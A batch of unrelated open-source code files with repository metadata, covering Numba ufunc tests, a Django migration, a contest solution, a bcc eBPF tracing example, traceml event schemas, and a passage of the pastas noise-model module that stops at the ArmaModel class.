targetoptions={'nopython': True})
builder.add("(int64, int64)")
ufunc = builder.build_ufunc()
self.assertEqual(ufunc(-1, 3), 2)
class TestUfuncBuildingJitDisabled(TestUfuncBuilding):
def setUp(self):
self.old_disable_jit = config.DISABLE_JIT
config.DISABLE_JIT = False
def tearDown(self):
config.DISABLE_JIT = self.old_disable_jit
class TestGUfuncBuilding(TestCase):
def test_basic_gufunc(self):
gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)")
cres = gufb.add("void(int32[:,:], int32[:,:], int32[:,:])")
self.assertFalse(cres.objectmode)
ufunc = gufb.build_ufunc()
a = np.arange(10, dtype="int32").reshape(2, 5)
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, np.dtype('int32'))
# Metadata
self.assertEqual(ufunc.__name__, "guadd")
self.assertIn("A generalized addition", ufunc.__doc__)
@tag('important')
def test_gufunc_struct(self):
gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)")
cres = gufb.add("void(complex64[:,:], complex64[:,:], complex64[:,:])")
self.assertFalse(cres.objectmode)
ufunc = gufb.build_ufunc()
a = np.arange(10, dtype="complex64").reshape(2, 5) + 1j
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
def test_gufunc_struct_forceobj(self):
gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)",
targetoptions=dict(forceobj=True))
cres = gufb.add("void(complex64[:,:], complex64[:,:], complex64[:,"
":])")
self.assertTrue(cres.objectmode)
ufunc = gufb.build_ufunc()
a = np.arange(10, dtype="complex64").reshape(2, 5) + 1j
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, np.dtype('complex64'))
class TestGUfuncBuildingJitDisabled(TestGUfuncBuilding):
def setUp(self):
self.old_disable_jit = config.DISABLE_JIT
config.DISABLE_JIT = False
def tearDown(self):
config.DISABLE_JIT = self.old_disable_jit
class TestVectorizeDecor(TestCase):
_supported_identities = [0, 1, None, "reorderable"]
def test_vectorize(self):
ufunc = vectorize(['int32(int32, int32)'])(add)
a = np.arange(10, dtype='int32')
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, np.dtype('int32'))
def test_vectorize_objmode(self):
ufunc = vectorize(['int32(int32, int32)'], forceobj=True)(add)
a = np.arange(10, dtype='int32')
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, np.dtype('int32'))
@tag('important')
def test_vectorize_bool_return(self):
ufunc = vectorize(['bool_(int32, int32)'])(equals)
a = np.arange(10, dtype='int32')
r = ufunc(a,a)
self.assertTrue(np.all(r))
self.assertEqual(r.dtype, np.dtype('bool_'))
@tag('important')
def test_vectorize_identity(self):
sig = 'int32(int32, int32)'
for identity in self._supported_identities:
ufunc = vectorize([sig], identity=identity)(add)
expected = None if identity == 'reorderable' else identity
self.assertEqual(ufunc.identity, expected)
# Default value is None
ufunc = vectorize([sig])(add)
self.assertIs(ufunc.identity, None)
# Invalid values
with self.assertRaises(ValueError):
vectorize([sig], identity='none')(add)
with self.assertRaises(ValueError):
vectorize([sig], identity=2)(add)
def test_vectorize_no_args(self):
a = np.linspace(0,1,10)
b = np.linspace(1,2,10)
ufunc = vectorize(add)
self.assertTrue(np.all(ufunc(a,b) == (a + b)))
ufunc2 = vectorize(add)
c = np.empty(10)
ufunc2(a, b, c)
self.assertTrue(np.all(c == (a + b)))
def test_vectorize_only_kws(self):
a = np.linspace(0,1,10)
b = np.linspace(1,2,10)
ufunc = vectorize(identity=PyUFunc_One, nopython=True)(mul)
self.assertTrue(np.all(ufunc(a,b) == (a * b)))
def test_vectorize_output_kwarg(self):
"""
Passing the output array as a keyword argument (issue #1867).
"""
def check(ufunc):
a = np.arange(10, 16, dtype='int32')
out = np.zeros_like(a)
got = ufunc(a, a, out=out)
self.assertIs(got, out)
self.assertPreciseEqual(out, a + a)
with self.assertRaises(TypeError):
ufunc(a, a, zzz=out)
# With explicit sigs
ufunc = vectorize(['int32(int32, int32)'], nopython=True)(add)
check(ufunc)
# With implicit sig
ufunc = vectorize(nopython=True)(add)
check(ufunc) # compiling
check(ufunc) # after compiling
@tag('important')
def test_guvectorize(self):
ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
"(x,y),(x,y)->(x,y)")(guadd)
a = np.arange(10, dtype='int32').reshape(2, 5)
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, np.dtype('int32'))
@tag('important')
def test_guvectorize_no_output(self):
ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
"(x,y),(x,y),(x,y)")(guadd)
a = np.arange(10, dtype='int32').reshape(2, 5)
out = np.zeros_like(a)
ufunc(a, a, out)
self.assertTrue(np.all(a + a == out))
def test_guvectorize_objectmode(self):
ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
"(x,y),(x,y)->(x,y)")(guadd_obj)
a = np.arange(10, dtype='int32').reshape(2, 5)
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
def test_guvectorize_scalar_objectmode(self):
"""
Test passing of scalars to object mode gufuncs.
"""
ufunc = guvectorize(['(int32[:,:], int32, int32[:,:])'],
"(x,y),()->(x,y)")(guadd_scalar_obj)
a = np.arange(10, dtype='int32').reshape(2, 5)
b = ufunc(a, 3)
self.assertTrue(np.all(a + 3 == b))
def test_guvectorize_error_in_objectmode(self):
ufunc = guvectorize(['(int32[:,:], int32[:,:], int32[:,:])'],
"(x,y),(x,y)->(x,y)", forceobj=True)(guerror)
a = np.arange(10, dtype='int32').reshape(2, 5)
with self.assertRaises(MyException):
ufunc(a, a)
@tag('important')
def test_guvectorize_identity(self):
args = (['(int32[:,:], int32[:,:], int32[:,:])'], "(x,y),(x,y)->(x,y)")
for identity in self._supported_identities:
ufunc = guvectorize(*args, identity=identity)(guadd)
expected = None if identity == 'reorderable' else identity
self.assertEqual(ufunc.identity, expected)
# Default value is None
ufunc = guvectorize(*args)(guadd)
self.assertIs(ufunc.identity, None)
# Invalid values
with self.assertRaises(ValueError):
guvectorize(*args, identity='none')(add)
with self.assertRaises(ValueError):
guvectorize(*args, identity=2)(add)
def test_guvectorize_invalid_layout(self):
sigs = ['(int32[:,:], int32[:,:], int32[:,:])']
# Syntax error
with self.assertRaises(ValueError) as raises:
guvectorize(sigs, ")-:")(guadd)
self.assertIn("bad token in signature", str(raises.exception))
# Output shape can't be inferred from inputs
with self.assertRaises(NameError) as raises:
guvectorize(sigs, "(x,y),(x,y)->(x,z,v)")(guadd)
self.assertEqual(str(raises.exception),
"undefined output symbols: v,z")
# Arrow but no outputs
with self.assertRaises(ValueError) as raises:
guvectorize(sigs, "(x,y),(x,y),(x,y)->")(guadd)
# (error message depends on Numpy version)
class TestVectorizeDecorJitDisabled(TestVectorizeDecor):
def setUp(self):
self.old_disable_jit = config.DISABLE_JIT
config.DISABLE_JIT = False
def tearDown(self):
config.DISABLE_JIT = self.old_disable_jit
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "755948017c721b3b862c1c2db03414f7",
"timestamp": "",
"source": "github",
"line_count": 382,
"max_line_length": 79,
"avg_line_length": 31.554973821989527,
"alnum_prop": 0.5578231292517006,
"repo_name": "stefanseefeld/numba",
"id": "48474a751cc2693bf019f01f819a4f306e44e9f4",
"size": "12054",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "numba/tests/npyufunc/test_ufuncbuilding.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5535"
},
{
"name": "C",
"bytes": "303376"
},
{
"name": "C++",
"bytes": "17024"
},
{
"name": "Cuda",
"bytes": "214"
},
{
"name": "HTML",
"bytes": "98846"
},
{
"name": "Jupyter Notebook",
"bytes": "110325"
},
{
"name": "Python",
"bytes": "3946372"
},
{
"name": "Shell",
"bytes": "2414"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('demo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='resume',
name='timestamp',
field=models.TextField(null=True),
),
migrations.AlterField(
model_name='resume',
name='latest_timestamp',
field=models.DateTimeField(auto_now_add=True),
),
]
| {
"content_hash": "080531518db9e55067bcb7503beefa78",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 58,
"avg_line_length": 23.130434782608695,
"alnum_prop": 0.5657894736842105,
"repo_name": "largescale-dfss/concept-demo",
"id": "b7595e8455b2c2e6fa421217c201e52a808f2225",
"size": "556",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/dfss/demo/migrations/0002_auto_20151216_0033.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "73"
},
{
"name": "HTML",
"bytes": "4659"
},
{
"name": "Python",
"bytes": "16436"
}
],
"symlink_target": ""
} |
from sys import stdin
from math import pi
def readLine():
return stdin.readline().strip()
def readInt():
return int(readLine())
def readInts():
return list(map(int, readLine().split()))
def main():
A, P1 = readInts()
R, P2 = readInts()
print('Whole pizza' if (A * 1.0 / P1) < ((pi * R * R) / P2) else 'Slice of pizza')
if __name__ == '__main__':
main() | {
"content_hash": "983a3a100bb73e9c54840cd4f93f77bf",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 86,
"avg_line_length": 19.63157894736842,
"alnum_prop": 0.5978552278820375,
"repo_name": "mikebsg01/Contests-Online",
"id": "3dea8a641dd4503e654ebcee9e4710e60f142256",
"size": "373",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "ACM-ICPC/Training/20190713/H.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5687"
},
{
"name": "C++",
"bytes": "66615"
},
{
"name": "Java",
"bytes": "1738"
},
{
"name": "Python",
"bytes": "66"
},
{
"name": "Ruby",
"bytes": "852"
},
{
"name": "Shell",
"bytes": "71"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from bcc import BPF
prog = """
int hello(void *ctx) {
bpf_trace_printk("Hello, World!\\n");
return 0;
}
"""
b = BPF(text=prog)
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
print("PID MESSAGE")
try:
b.trace_print(fmt="{1} {5}")
except KeyboardInterrupt:
exit()
| {
"content_hash": "578b87d1107eef27557a9801837789c9",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 69,
"avg_line_length": 21,
"alnum_prop": 0.6547619047619048,
"repo_name": "brendangregg/bcc",
"id": "1c5beef2143f322966f7f9433b9e16769bc56cb6",
"size": "589",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/tracing/trace_fields.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "8274020"
},
{
"name": "C++",
"bytes": "890599"
},
{
"name": "CMake",
"bytes": "48236"
},
{
"name": "HTML",
"bytes": "2997"
},
{
"name": "Lua",
"bytes": "299473"
},
{
"name": "Makefile",
"bytes": "3214"
},
{
"name": "Python",
"bytes": "1377079"
},
{
"name": "Shell",
"bytes": "21733"
}
],
"symlink_target": ""
} |
import json
from collections import namedtuple
from typing import Dict, Mapping, Optional, Union
from marshmallow import ValidationError, fields, pre_load, validate, validates_schema
import polyaxon_sdk
from polyaxon.parser import parser
from polyaxon.schemas.base import BaseConfig, BaseSchema
from polyaxon.utils.csv_utils import validate_csv
from polyaxon.utils.date_utils import parse_datetime
from polyaxon.utils.np_utils import sanitize_np_types
from polyaxon.utils.signal_decorators import check_partial
from polyaxon.utils.tz_utils import now
from traceml.artifacts.kinds import V1ArtifactKind
class EventImageSchema(BaseSchema):
height = fields.Int(allow_none=True)
width = fields.Int(allow_none=True)
colorspace = fields.Int(allow_none=True)
path = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventImage
class V1EventImage(BaseConfig, polyaxon_sdk.V1EventImage):
IDENTIFIER = V1ArtifactKind.IMAGE
SCHEMA = EventImageSchema
REDUCED_ATTRIBUTES = ["height", "width", "colorspace", "path"]
class EventVideoSchema(BaseSchema):
height = fields.Int(allow_none=True)
width = fields.Int(allow_none=True)
colorspace = fields.Int(allow_none=True)
path = fields.Str(allow_none=True)
content_type = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventVideo
class V1EventVideo(BaseConfig, polyaxon_sdk.V1EventVideo):
IDENTIFIER = V1ArtifactKind.VIDEO
SCHEMA = EventImageSchema
REDUCED_ATTRIBUTES = ["height", "width", "colorspace", "path", "content_type"]
class EventDataframeSchema(BaseSchema):
path = fields.Str(allow_none=True)
content_type = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventDataframe
class V1EventDataframe(BaseConfig, polyaxon_sdk.V1EventDataframe):
IDENTIFIER = V1ArtifactKind.DATAFRAME
SCHEMA = EventDataframeSchema
REDUCED_ATTRIBUTES = ["path", "content_type"]
class EventHistogramSchema(BaseSchema):
values = fields.List(fields.Float(), allow_none=True)
counts = fields.List(fields.Float(), allow_none=True)
@staticmethod
def schema_config():
return V1EventHistogram
class V1EventHistogram(BaseConfig, polyaxon_sdk.V1EventHistogram):
IDENTIFIER = V1ArtifactKind.HISTOGRAM
SCHEMA = EventHistogramSchema
REDUCED_ATTRIBUTES = ["values", "counts"]
class EventAudioSchema(BaseSchema):
sample_rate = fields.Float(allow_none=True)
num_channels = fields.Int(allow_none=True)
length_frames = fields.Int(allow_none=True)
path = fields.Str(allow_none=True)
content_type = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventAudio
class V1EventAudio(BaseConfig, polyaxon_sdk.V1EventAudio):
IDENTIFIER = V1ArtifactKind.AUDIO
SCHEMA = EventAudioSchema
REDUCED_ATTRIBUTES = [
"sample_rate",
"num_channels",
"length_frames",
"path",
"content_type",
]
class V1EventChartKind(polyaxon_sdk.V1EventChartKind):
pass
class EventChartSchema(BaseSchema):
kind = fields.Str(
allow_none=True, validate=validate.OneOf(V1EventChartKind.allowable_values)
)
figure = fields.Dict(allow_none=True)
@staticmethod
def schema_config():
return V1EventChart
class V1EventChart(BaseConfig, polyaxon_sdk.V1EventChart):
IDENTIFIER = V1ArtifactKind.CHART
SCHEMA = EventChartSchema
REDUCED_ATTRIBUTES = ["kind", "figure"]
def to_dict(self, humanize_values=False, unknown=None, dump=False):
if self.kind == V1EventChartKind.PLOTLY:
import plotly.tools
obj = self.obj_to_dict(
self, humanize_values=humanize_values, unknown=unknown
)
return json.dumps(obj, cls=plotly.utils.PlotlyJSONEncoder)
# Resume normal serialization
return super().to_dict(humanize_values, unknown, dump)
class V1EventCurveKind(polyaxon_sdk.V1EventCurveKind):
pass
class EventCurveSchema(BaseSchema):
kind = fields.Str(
allow_none=True, validate=validate.OneOf(V1EventCurveKind.allowable_values)
)
x = fields.List(fields.Float(), allow_none=True)
y = fields.List(fields.Float(), allow_none=True)
annotation = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventCurve
class V1EventCurve(BaseConfig, polyaxon_sdk.V1EventCurve):
IDENTIFIER = V1ArtifactKind.CURVE
SCHEMA = EventCurveSchema
REDUCED_ATTRIBUTES = ["kind", "x", "y", "annotation"]
class EventConfusionMatrixSchema(BaseSchema):
x = fields.List(fields.Raw(), allow_none=True)
y = fields.List(fields.Raw(), allow_none=True)
z = fields.List(fields.Raw(), allow_none=True)
@staticmethod
def schema_config():
return V1EventConfusionMatrix
class V1EventConfusionMatrix(BaseConfig, polyaxon_sdk.V1EventConfusionMatrix):
IDENTIFIER = V1ArtifactKind.CONFUSION
SCHEMA = EventConfusionMatrixSchema
REDUCED_ATTRIBUTES = ["x", "y", "z"]
class EventArtifactSchema(BaseSchema):
kind = fields.Str(
allow_none=True, validate=validate.OneOf(V1ArtifactKind.allowable_values)
)
path = fields.Str(allow_none=True)
@staticmethod
def schema_config():
return V1EventArtifact
class V1EventArtifact(BaseConfig, polyaxon_sdk.V1EventArtifact):
IDENTIFIER = "artifact"
SCHEMA = EventArtifactSchema
REDUCED_ATTRIBUTES = ["kind", "path"]
class EventModelSchema(BaseSchema):
framework = fields.Str(allow_none=True)
path = fields.Str(allow_none=True)
spec = fields.Raw(allow_none=True)
@staticmethod
def schema_config():
return V1EventModel
class V1EventModel(BaseConfig, polyaxon_sdk.V1EventModel):
IDENTIFIER = V1ArtifactKind.MODEL
SCHEMA = EventModelSchema
REDUCED_ATTRIBUTES = ["framework", "path", "spec"]
class EventSchema(BaseSchema):
timestamp = fields.DateTime(allow_none=True)
step = fields.Int(allow_none=True)
metric = fields.Float(allow_none=True)
image = fields.Nested(EventImageSchema, allow_none=True)
histogram = fields.Nested(EventHistogramSchema, allow_none=True)
audio = fields.Nested(EventAudioSchema, allow_none=True)
video = fields.Nested(EventVideoSchema, allow_none=True)
html = fields.Str(allow_none=True)
text = fields.Str(allow_none=True)
chart = fields.Nested(EventChartSchema, allow_none=True)
curve = fields.Nested(EventCurveSchema, allow_none=True)
confusion = fields.Nested(EventConfusionMatrixSchema, allow_none=True)
artifact = fields.Nested(EventArtifactSchema, allow_none=True)
model = fields.Nested(EventModelSchema, allow_none=True)
dataframe = fields.Nested(EventDataframeSchema, allow_none=True)
@staticmethod
def schema_config():
return V1Event
@pre_load
def pre_validate(self, data, **kwargs):
if data.get(V1ArtifactKind.IMAGE) is not None:
data[V1ArtifactKind.IMAGE] = parser.get_dict(
key=V1ArtifactKind.IMAGE,
value=data[V1ArtifactKind.IMAGE],
)
if data.get(V1ArtifactKind.HISTOGRAM) is not None:
data[V1ArtifactKind.HISTOGRAM] = parser.get_dict(
key=V1ArtifactKind.HISTOGRAM,
value=data[V1ArtifactKind.HISTOGRAM],
)
if data.get(V1ArtifactKind.AUDIO) is not None:
data[V1ArtifactKind.AUDIO] = parser.get_dict(
key=V1ArtifactKind.AUDIO,
value=data[V1ArtifactKind.AUDIO],
)
if data.get(V1ArtifactKind.VIDEO) is not None:
data[V1ArtifactKind.VIDEO] = parser.get_dict(
key=V1ArtifactKind.VIDEO,
value=data[V1ArtifactKind.VIDEO],
)
if data.get(V1ArtifactKind.CHART) is not None:
data[V1ArtifactKind.CHART] = parser.get_dict(
key=V1ArtifactKind.CHART,
value=data[V1ArtifactKind.CHART],
)
if data.get(V1ArtifactKind.CURVE) is not None:
data[V1ArtifactKind.CURVE] = parser.get_dict(
key=V1ArtifactKind.CURVE,
value=data[V1ArtifactKind.CURVE],
)
if data.get(V1ArtifactKind.CONFUSION) is not None:
data[V1ArtifactKind.CONFUSION] = parser.get_dict(
key=V1ArtifactKind.CONFUSION,
value=data[V1ArtifactKind.CONFUSION],
)
if data.get("artifact") is not None:
data["artifact"] = parser.get_dict(
key="artifact",
value=data["artifact"],
)
if data.get(V1ArtifactKind.MODEL) is not None:
data[V1ArtifactKind.MODEL] = parser.get_dict(
key=V1ArtifactKind.MODEL,
value=data[V1ArtifactKind.MODEL],
)
if data.get(V1ArtifactKind.DATAFRAME) is not None:
data[V1ArtifactKind.DATAFRAME] = parser.get_dict(
key=V1ArtifactKind.DATAFRAME,
value=data[V1ArtifactKind.DATAFRAME],
)
return data
@validates_schema
@check_partial
def validate_event(self, values, **kwargs):
count = 0
def increment(c):
c += 1
if c > 1:
raise ValidationError(
"An event should have one and only one primitive, found {}.".format(
c
)
)
return c
if values.get(V1ArtifactKind.METRIC) is not None:
count = increment(count)
if values.get(V1ArtifactKind.IMAGE) is not None:
count = increment(count)
if values.get(V1ArtifactKind.HISTOGRAM) is not None:
count = increment(count)
if values.get(V1ArtifactKind.AUDIO) is not None:
count = increment(count)
if values.get(V1ArtifactKind.VIDEO) is not None:
count = increment(count)
if values.get(V1ArtifactKind.HTML) is not None:
count = increment(count)
if values.get(V1ArtifactKind.TEXT) is not None:
count = increment(count)
if values.get(V1ArtifactKind.CHART) is not None:
count = increment(count)
if values.get(V1ArtifactKind.CURVE) is not None:
count = increment(count)
if values.get(V1ArtifactKind.CONFUSION) is not None:
count = increment(count)
if values.get("artifact") is not None:
count = increment(count)
if values.get(V1ArtifactKind.MODEL) is not None:
count = increment(count)
if values.get(V1ArtifactKind.DATAFRAME) is not None:
count = increment(count)
if count != 1:
raise ValidationError(
"An event should have one and only one primitive, found {}.".format(
count
)
)
class V1Event(BaseConfig, polyaxon_sdk.V1Event):
SEPARATOR = "|"
IDENTIFIER = "event"
SCHEMA = EventSchema
REDUCED_ATTRIBUTES = [
"metric",
"image",
"histogram",
"audio",
"video",
"html",
"text",
"chart",
"curve",
"confusion",
"artifact",
"model",
"dataframe",
]
@classmethod
def make(
cls,
step: int = None,
timestamp=None,
metric: float = None,
image: V1EventImage = None,
histogram: V1EventHistogram = None,
audio: V1EventAudio = None,
video: V1EventVideo = None,
html: str = None,
text: str = None,
chart: V1EventChart = None,
curve: V1EventCurve = None,
confusion: V1EventConfusionMatrix = None,
artifact: V1EventArtifact = None,
model: V1EventModel = None,
dataframe: V1EventDataframe = None,
) -> "V1Event":
if isinstance(timestamp, str):
try:
timestamp = parse_datetime(timestamp)
except Exception as e:
raise ValidationError("Received an invalid timestamp") from e
return cls(
timestamp=timestamp if timestamp else now(tzinfo=True),
step=step,
metric=metric,
image=image,
histogram=histogram,
audio=audio,
video=video,
html=html,
text=text,
chart=chart,
curve=curve,
confusion=confusion,
artifact=artifact,
model=model,
dataframe=dataframe,
)
def get_value(self, dump=True):
if self.metric is not None:
return str(self.metric) if dump else self.metric
if self.image is not None:
return self.image.to_dict(dump=dump) if dump else self.image
if self.histogram is not None:
return self.histogram.to_dict(dump=dump) if dump else self.histogram
if self.audio is not None:
return self.audio.to_dict(dump=dump) if dump else self.audio
if self.video is not None:
return self.video.to_dict(dump=dump) if dump else self.video
if self.html is not None:
return self.html
if self.text is not None:
return self.text
if self.chart is not None:
return self.chart.to_dict(dump=dump) if dump else self.chart
if self.curve is not None:
return self.curve.to_dict(dump=dump) if dump else self.curve
if self.confusion is not None:
return self.confusion.to_dict(dump=dump) if dump else self.confusion
if self.artifact is not None:
return self.artifact.to_dict(dump=dump) if dump else self.artifact
if self.model is not None:
return self.model.to_dict(dump=dump) if dump else self.model
if self.dataframe is not None:
return self.dataframe.to_dict(dump=dump) if dump else self.dataframe
def to_csv(self) -> str:
values = [
str(self.step) if self.step is not None else "",
str(self.timestamp) if self.timestamp is not None else "",
self.get_value(dump=True),
]
return self.SEPARATOR.join(values)
class V1Events:
ORIENT_CSV = "csv"
ORIENT_DICT = "dict"
def __init__(self, kind, name, df):
self.kind = kind
self.name = name
self.df = df
@classmethod
def read(
cls, kind: str, name: str, data: Union[str, Dict], parse_dates: bool = True
) -> "V1Events":
import pandas as pd
if isinstance(data, str):
csv = validate_csv(data)
if parse_dates:
df = pd.read_csv(
csv,
sep=V1Event.SEPARATOR,
parse_dates=["timestamp"],
)
else:
df = pd.read_csv(
csv,
sep=V1Event.SEPARATOR,
)
elif isinstance(data, dict):
df = pd.DataFrame.from_dict(data)
else:
raise ValueError(
"V1Events received an unsupported value type: {}".format(type(data))
)
return cls(name=name, kind=kind, df=df)
def to_dict(self, orient: str = "list") -> Dict:
import numpy as np
return self.df.replace({np.nan: None}).to_dict(orient=orient)
def get_event_at(self, index):
event = self.df.iloc[index].to_dict()
event["timestamp"] = event["timestamp"].isoformat()
event["step"] = sanitize_np_types(event["step"])
return V1Event.from_dict(event)
def _get_step_summary(self) -> Optional[Dict]:
_count = self.df.step.count()
if _count == 0:
return None
return {
"count": sanitize_np_types(_count),
"min": sanitize_np_types(self.df.step.iloc[0]),
"max": sanitize_np_types(self.df.step.iloc[-1]),
}
def _get_ts_summary(self) -> Optional[Dict]:
_count = self.df.timestamp.count()
if _count == 0:
return None
return {
"min": self.df.timestamp.iloc[0].isoformat(),
"max": self.df.timestamp.iloc[-1].isoformat(),
}
def get_summary(self) -> Dict:
summary = {"is_event": True}
step_summary = self._get_step_summary()
if step_summary:
summary["step"] = step_summary
ts_summary = self._get_ts_summary()
if ts_summary:
summary["timestamp"] = ts_summary
if self.kind == V1ArtifactKind.METRIC:
summary[self.kind] = {
k: sanitize_np_types(v)
for k, v in self.df.metric.describe().to_dict().items()
}
summary[self.kind]["last"] = sanitize_np_types(self.df.metric.iloc[-1])
return summary
class LoggedEventSpec(namedtuple("LoggedEventSpec", "name kind event")):
pass
class LoggedEventListSpec(namedtuple("LoggedEventListSpec", "name kind events")):
def get_csv_header(self) -> str:
return V1Event.SEPARATOR.join(["step", "timestamp", self.kind])
def get_csv_events(self) -> str:
events = ["\n{}".format(e.to_csv()) for e in self.events]
return "".join(events)
def empty_events(self):
self.events[:] = []
def to_dict(self):
return {
"name": self.name,
"kind": self.kind,
"events": [e.to_dict() for e in self.events],
}
@classmethod
def from_dict(cls, value: Mapping) -> "LoggedEventListSpec":
return cls(
name=value.get("name"),
kind=value.get("kind"),
events=[V1Event.from_dict(e) for e in value.get("events", [])],
)
| {
"content_hash": "f00de3c47735af6f1d36d69924a36788",
"timestamp": "",
"source": "github",
"line_count": 557,
"max_line_length": 88,
"avg_line_length": 32.156193895870736,
"alnum_prop": 0.6129752665959466,
"repo_name": "polyaxon/polyaxon",
"id": "b102f5491c7d90b8808d0b8510a444f52564057d",
"size": "18515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "traceml/traceml/events/schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "5201898"
},
{
"name": "Shell",
"bytes": "1565"
}
],
"symlink_target": ""
} |
"""This module contains the noise models available in Pastas.
A Noise model may be used to transform the residual series into a noise
series that better represents white noise.
Examples
--------
By default, a noise model is added to a Pastas model. It is possible to
replace the default model with different models as follows:
>>> n = ps.ArmaModel()
>>> ml.add_noisemodel(n)
or, to delete the noise model from the model:
>>> ml.del_noisemodel()
See Also
--------
pastas.model.Model.add_noisemodel
"""
import numpy as np
from pandas import DataFrame, Series, Timedelta
from .decorators import njit, set_parameter
from .utils import check_numba
__all__ = ["NoiseModel", "ArmaModel"]
class NoiseModelBase:
_name = "NoiseModelBase"
def __init__(self):
self.nparam = 1
self.name = "noise"
self.parameters = DataFrame(
columns=["initial", "pmin", "pmax", "vary", "name"])
def set_init_parameters(self, oseries=None):
if oseries is not None:
pinit = np.diff(oseries.index.to_numpy()) / Timedelta("1D")
pinit = np.median(pinit)
else:
pinit = 14.0
self.parameters.loc["noise_alpha"] = (pinit, 1e-5, 5000, True, "noise")
@set_parameter
def _set_initial(self, name, value):
"""Internal method to set the initial parameter value.
Notes
-----
The preferred method for parameter setting is through the model.
"""
self.parameters.loc[name, "initial"] = value
@set_parameter
def _set_pmin(self, name, value):
"""Internal method to set the minimum value of the noisemodel.
Notes
-----
The preferred method for parameter setting is through the model.
"""
self.parameters.loc[name, "pmin"] = value
@set_parameter
def _set_pmax(self, name, value):
"""Internal method to set the maximum parameter values.
Notes
-----
The preferred method for parameter setting is through the model.
"""
self.parameters.loc[name, "pmax"] = value
@set_parameter
def _set_vary(self, name, value):
"""Internal method to set if the parameter is varied.
Notes
-----
The preferred method for parameter setting is through the model.
"""
self.parameters.loc[name, "vary"] = value
def to_dict(self):
return {"type": self._name}
@staticmethod
def weights(res, p):
return 1
class NoiseModel(NoiseModelBase):
"""Noise model with exponential decay of the residuals and weighting.
Parameters
----------
norm: boolean, optional
Boolean to indicate whether weights are normalized according to
the Von Asmuth and Bierkens (2005) paper. Default is True.
Notes
-----
Calculates the noise [1]_ according to:
.. math::
v(t_1) = r(t_1) - r(t_0) * \\exp(- \\Delta t / \\alpha)
Calculates the weights as
.. math::
w = 1 / \\sqrt{(1 - \\exp(-2 \\Delta t / \\alpha))}
The units of the alpha parameter is always in days. The first value of
the noise is the residual ($v(t=0=r(t=0)$). First weight is
1 / sig_residuals (i.e., delt = infty). Normalization of weights as in
Von Asmuth and Bierkens (2005), optional.
Differences compared to NoiseModelOld:
1. First value is residual
2. First weight is 1 / sig_residuals (i.e., delt = infty)
3. Normalization of weights as in Von Asmuth and Bierkens (2005), optional
References
----------
.. [1] von Asmuth, J. R., and M. F. P. Bierkens (2005), Modeling
irregularly spaced residual series as a continuous stochastic
process, Water Resour. Res., 41, W12404, doi:10.1029/2004WR003726.
"""
_name = "NoiseModel"
def __init__(self, norm=True):
NoiseModelBase.__init__(self)
self.norm = norm
self.nparam = 1
self.set_init_parameters()
@staticmethod
def simulate(res, p):
"""Simulate noise from the residuals.
Parameters
----------
res: pandas.Series
The residual series.
p: array_like
array_like object with the values as floats representing the
model parameters. Here, Alpha parameter used by the noisemodel.
Returns
-------
noise: pandas.Series
Series of the noise.
"""
alpha = p[0]
odelt = np.diff(res.index.to_numpy()) / Timedelta("1D")
v = np.append(res.values[0], res.values[1:] - np.exp(-odelt / alpha)
* res.values[:-1])
return Series(data=v, index=res.index, name="Noise")
def weights(self, res, p):
"""Method to calculate the weights for the noise.
Parameters
----------
res: pandas.Series
Pandas Series with the residuals to compute the weights for. The
Series index must be a DatetimeIndex.
p: numpy.ndarray
numpy array with the parameters used in the noise model.
Returns
-------
w: pandas.Series
Series of the weights.
Notes
-----
Weights are
.. math:: w = 1 / sqrt((1 - exp(-2 \\Delta t / \\alpha)))
which are then normalized so that sum(w) = len(res)
"""
alpha = p[0]
# large for first measurement
odelt = np.append(1e12, np.diff(res.index.to_numpy()) /
Timedelta("1D"))
exp = np.exp(-2.0 / alpha * odelt) # Twice as fast as 2*odelt/alpha
w = 1 / np.sqrt(1.0 - exp) # weights of noise, not noise^2
if self.norm:
w *= np.exp(1.0 / (2.0 * odelt.size) * np.sum(np.log(1.0 - exp)))
return Series(data=w, index=res.index, name="noise_weights")
class ArmaModel(NoiseModelBase):
